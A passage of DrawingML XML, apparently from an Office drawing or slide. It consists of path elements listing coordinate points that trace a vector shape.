                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2966" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="3497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123" y="3597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3013" y="3423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="3323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2950" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023" y="3801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2897" y="3859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603" y="3932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2582" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="3801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="3707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388" y="3512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388" y="3413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2425" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2378" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362" y="3418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357" y="3517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="3617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="3938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2283" y="4053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1690" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1695" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769" y="4105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1858" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2063" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2435" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2462" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2556" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2556" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="4247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362" y="4315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2283" y="4389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2210" y="4473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="4562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2026" y="4751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="4888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769" y="4809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711" y="4762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559" y="4609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517" y="4552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511" y="4568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1548" y="4630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590" y="4693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1858" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1874" y="5077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="5103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="5218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="5313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1937" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="5229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="5134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2068" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2068" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530" y="5339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2887" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2960" y="5486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2913" y="5539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2866" y="5591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2798" y="5633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="5633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="5785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="5754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2803" y="5754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2834" y="5717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2829" y="5659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2829" y="5659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2893" y="5607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2945" y="5554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="5450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3491" y="5455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3591" y="5450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3879" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3858" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3805" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3753" y="5554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3695" y="5597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3580" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3449" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="5765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="5791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3249" y="5812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3176" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102" y="5843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3029" y="5854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2803" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2724" y="5854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646" y="5843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2320" y="5744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="5665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089" y="5618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2021" y="5565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721" y="5245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1680" y="5187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1617" y="5061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1585" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1537" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517" y="4793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1507" y="4720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1490" y="4646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485" y="4573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485" y="4332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1501" y="4211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="3827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1669" y="3759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1753" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="3449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="3397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="3350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2094" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2157" y="3260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231" y="3218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299" y="3187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372" y="3155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2756" y="3066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="3071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3396" y="3160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3632" y="3281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3706" y="3334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="3391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3848" y="3449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="3517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3974" y="3586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4026" y="3659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4079" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4126" y="3817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4163" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4199" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4226" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4247" y="4168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="4263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273" y="4362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273" y="4562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4263" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4247" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4278" y="4468"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4252" y="4426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173" y="4342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4205" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4468"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1564" y="3969"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1574" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611" y="4032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
